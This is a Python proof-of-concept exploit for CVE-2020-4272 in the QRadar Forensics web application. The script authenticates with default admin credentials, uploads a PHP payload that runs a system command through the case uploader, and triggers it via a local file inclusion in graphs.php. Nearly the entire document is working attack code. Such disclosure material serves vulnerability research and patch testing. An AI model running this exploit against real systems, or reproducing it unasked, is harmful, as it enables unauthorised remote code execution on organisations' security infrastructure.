Arbitrary class instantiation & local file inclusion vulnerability in QRadar Forensics web application (CVE-2020-4272) proof of concept

qradar_php_lfi.py

#!/usr/bin/env python3
import json
import urllib3
import requests
import urllib.parse
from requests.cookies import cookiejar_from_dict

base_url=f'https://127.0.0.1/'
username='admin'
password='initial'
verifycert=False
payload = '<?php system("id");exit();'
case_name = 'case1337'

if not verifycert:
   urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

response = requests.get(f'{base_url}console/',
      verify=verifycert, allow_redirects=False,
      auth=requests.auth.HTTPBasicAuth(username, password))

if response.status_code != 302:
   print(f"failed login as '{username}'")
   exit(1)

cookies = cookiejar_from_dict({'SEC': response.cookies['SEC'], 'QRIF': response.cookies['SEC'], 'QRadarCSRF': response.cookies['QRadarCSRF']})
headers = {'Referer': f'{base_url}forensics/'}
url = f'{base_url}forensics/graphs.php'

files = {'files': ('payload.php', payload)}
data = {'case_name': case_name, 'upload_action': 'upload_pcap', 'QRadarCSRF': cookies['QRadarCSRF']}
url = f'{base_url}forensics/includes/jquery/uploader/server/php/index.php'
response = requests.post(url, files=files, data=data,
   verify=verifycert, cookies=cookies, headers=headers)
json = json.loads(response.text)

url = f'{base_url}forensics/graphs.php?chart=WebSiteChart&dataset=/opt/ibm/forensics/case_input_staging/{case_name}/{json["files"][0]["name"][:-4]}'
response = requests.get(url, verify=verifycert, cookies=cookies, headers=headers)
print(response.text)